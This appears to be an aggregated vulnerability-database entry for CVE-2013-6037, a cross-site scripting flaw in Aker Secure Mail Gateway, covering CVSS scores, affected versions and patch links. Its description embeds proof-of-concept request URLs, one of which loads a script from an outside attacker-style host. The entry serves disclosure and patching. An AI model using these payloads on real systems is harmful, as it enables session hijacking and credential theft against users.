Details of VAR-201403-0131

ID

VAR-201403-0131

CVE

CVE-2013-6037

TITLE

Aker Secure Mail Gateway Cross-site scripting vulnerability

Trust: 1.4

sources: JVNDB: JVNDB-2014-001590 // CNNVD: CNNVD-201403-193

DESCRIPTION

Cross-site scripting (XSS) vulnerability in index.php in Aker Secure Mail Gateway 2.5.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the msg_id parameter. (CWE-79). CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') http://cwe.mitre.org/data/definitions/79.htmlAn arbitrary script may be executed on the user's web browser. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. The solution supports user permission setting, mail filtering, Aker anti-virus module, etc. The vulnerability is caused by the index.php script not filtering the 'msg_id' parameter sufficiently. XSS in url for access of Confirmation Required in box for antispam from company AKER (CVE-2013-6037) I. The code injection is done through the parameter "msg_id" and "content" in the page index.php. IV. PROOF OF CONCEPT ------------------------- The application does not validate the double encoding of the "msg_id" parameter correctly. Malicious Request ("msg_id") http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script>alert(String(/XSS/).substr(1,6) ); </script> Vulnerable: http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script src=http://10.0.1.142:5005/xook.js></script> Vulnerable: http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><iframe src=http://www.google.com> </iframe> V. VI. SOLUTION ------------------------- http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp References http://www.kb.cert.org/vuls/id/687278 http://www.aker.com.br/ http://www.aker.com.br/produtos/aker-secure-mail-gateway http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All By Wiliam Costa

Trust: 3.33

sources: NVD: CVE-2013-6037 // CERT/CC: VU#687278 // JVNDB: JVNDB-2014-001590 // CNVD: CNVD-2014-01551 // BID: 66024 // VULHUB: VHN-66039 // PACKETSTORM: 125599

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2014-01551

AFFECTED PRODUCTS

vendor:	aker	model:	secure mail gateway	scope:	eq	version:	2.5.2	Trust: 1.2
vendor:	aker	model:	secure mail gateway	scope:	lte	version:	2.5.2	Trust: 1.0
vendor:	aker security	model:	-	scope:	-	version:	-	Trust: 0.8
vendor:	aker security	model:	secure mail gateway	scope:	lte	version:	2.5.2	Trust: 0.8

sources: CERT/CC: VU#687278 // CNVD: CNVD-2014-01551 // JVNDB: JVNDB-2014-001590 // CNNVD: CNNVD-201403-193 // NVD: CVE-2013-6037

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD:	CVE-2013-6037
value:	MEDIUM
Trust: 1.6
nvd@nist.gov:	CVE-2013-6037
value:	MEDIUM
Trust: 1.0
CNVD:	CNVD-2014-01551
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201403-193
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-66039
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2013-6037
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
NVD:	CVE-2013-6037
severity:	MEDIUM
baseScore:	4.3
vectorString:	NONE
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.8
CNVD:	CNVD-2014-01551
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-66039
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: CERT/CC: VU#687278 // CNVD: CNVD-2014-01551 // VULHUB: VHN-66039 // JVNDB: JVNDB-2014-001590 // CNNVD: CNNVD-201403-193 // NVD: CVE-2013-6037

PROBLEMTYPE DATA

problemtype:

CWE-79

Trust: 2.7

sources: CERT/CC: VU#687278 // VULHUB: VHN-66039 // JVNDB: JVNDB-2014-001590 // NVD: CVE-2013-6037

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201403-193

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 125599 // CNNVD: CNNVD-201403-193

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-001590

EXPLOIT AVAILABILITY

sources: CERT/CC: VU#687278 // VULHUB: VHN-66039

PATCH

title:	Atualizacoes do Aker Secure Mail Gateway	url:	http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All	Trust: 0.8
title:	Aker Secure Mail Gateway	url:	http://www.aker.com.br/produtos/aker-secure-mail-gateway	Trust: 0.8
title:	Aker Secure Mail Gateway 'index.php' cross-site scripting vulnerability patch	url:	https://www.cnvd.org.cn/patchInfo/show/44145	Trust: 0.6
title:	akercontrolcenter-2.0.14-xx-linux-akersecuremailgateway_2.5.4-002	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=48623	Trust: 0.6
title:	akercontrolcenter-2.0.14-xx-win-akersecuremailgateway_2.5.4-002	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=48622	Trust: 0.6

sources: CNVD: CNVD-2014-01551 // JVNDB: JVNDB-2014-001590 // CNNVD: CNNVD-201403-193

EXTERNAL IDS

db:	CERT/CC	id:	VU#687278	Trust: 4.0
db:	NVD	id:	CVE-2013-6037	Trust: 3.5
db:	BID	id:	66024	Trust: 2.0
db:	JVN	id:	JVNVU91643393	Trust: 0.8
db:	JVNDB	id:	JVNDB-2014-001590	Trust: 0.8
db:	CNNVD	id:	CNNVD-201403-193	Trust: 0.7
db:	CNVD	id:	CNVD-2014-01551	Trust: 0.6
db:	SECUNIA	id:	57236	Trust: 0.6
db:	PACKETSTORM	id:	125599	Trust: 0.2
db:	VULHUB	id:	VHN-66039	Trust: 0.1

sources: CERT/CC: VU#687278 // CNVD: CNVD-2014-01551 // VULHUB: VHN-66039 // BID: 66024 // JVNDB: JVNDB-2014-001590 // PACKETSTORM: 125599 // CNNVD: CNNVD-201403-193 // NVD: CVE-2013-6037

REFERENCES

url:	http://www.kb.cert.org/vuls/id/687278	Trust: 3.2
url:	http://www.securityfocus.com/bid/66024	Trust: 1.1
url:	http://www.aker.com.br/	Trust: 0.9
url:	http://www.aker.com.br/produtos/aker-secure-mail-gateway	Trust: 0.9
url:	http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=all	Trust: 0.8
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=%20cve-2013-6037	Trust: 0.8
url:	http://jvn.jp/vu/jvnvu91643393/index.html	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6037	Trust: 0.8
url:	http://secunia.com/advisories/57236	Trust: 0.6
url:	http://www.google.com>	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-6037	Trust: 0.1
url:	http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=all	Trust: 0.1
url:	http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script	Trust: 0.1
url:	http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script>alert(string(/xss/).substr(1,6)	Trust: 0.1
url:	http://10.0.1.142:5005/xook.js></script>	Trust: 0.1
url:	http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp	Trust: 0.1
url:	http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><iframe	Trust: 0.1

sources: CERT/CC: VU#687278 // CNVD: CNVD-2014-01551 // VULHUB: VHN-66039 // JVNDB: JVNDB-2014-001590 // PACKETSTORM: 125599 // CNNVD: CNNVD-201403-193 // NVD: CVE-2013-6037

CREDITS

William Costa

Trust: 0.4

sources: BID: 66024 // PACKETSTORM: 125599

SOURCES

db:	CERT/CC	id:	VU#687278
db:	CNVD	id:	CNVD-2014-01551
db:	VULHUB	id:	VHN-66039
db:	BID	id:	66024
db:	JVNDB	id:	JVNDB-2014-001590
db:	PACKETSTORM	id:	125599
db:	CNNVD	id:	CNNVD-201403-193
db:	NVD	id:	CVE-2013-6037

LAST UPDATE DATE

2025-04-13T23:36:36.982000+00:00

SOURCES UPDATE DATE

db:	CERT/CC	id:	VU#687278	date:	2014-03-06T00:00:00
db:	CNVD	id:	CNVD-2014-01551	date:	2014-03-11T00:00:00
db:	VULHUB	id:	VHN-66039	date:	2016-12-31T00:00:00
db:	BID	id:	66024	date:	2014-03-06T00:00:00
db:	JVNDB	id:	JVNDB-2014-001590	date:	2014-03-12T00:00:00
db:	CNNVD	id:	CNNVD-201403-193	date:	2014-03-12T00:00:00
db:	NVD	id:	CVE-2013-6037	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	CERT/CC	id:	VU#687278	date:	2014-03-06T00:00:00
db:	CNVD	id:	CNVD-2014-01551	date:	2014-03-11T00:00:00
db:	VULHUB	id:	VHN-66039	date:	2014-03-11T00:00:00
db:	BID	id:	66024	date:	2014-03-06T00:00:00
db:	JVNDB	id:	JVNDB-2014-001590	date:	2014-03-10T00:00:00
db:	PACKETSTORM	id:	125599	date:	2014-03-07T20:32:22
db:	CNNVD	id:	CNNVD-201403-193	date:	2014-03-12T00:00:00
db:	NVD	id:	CVE-2013-6037	date:	2014-03-11T13:01:03.547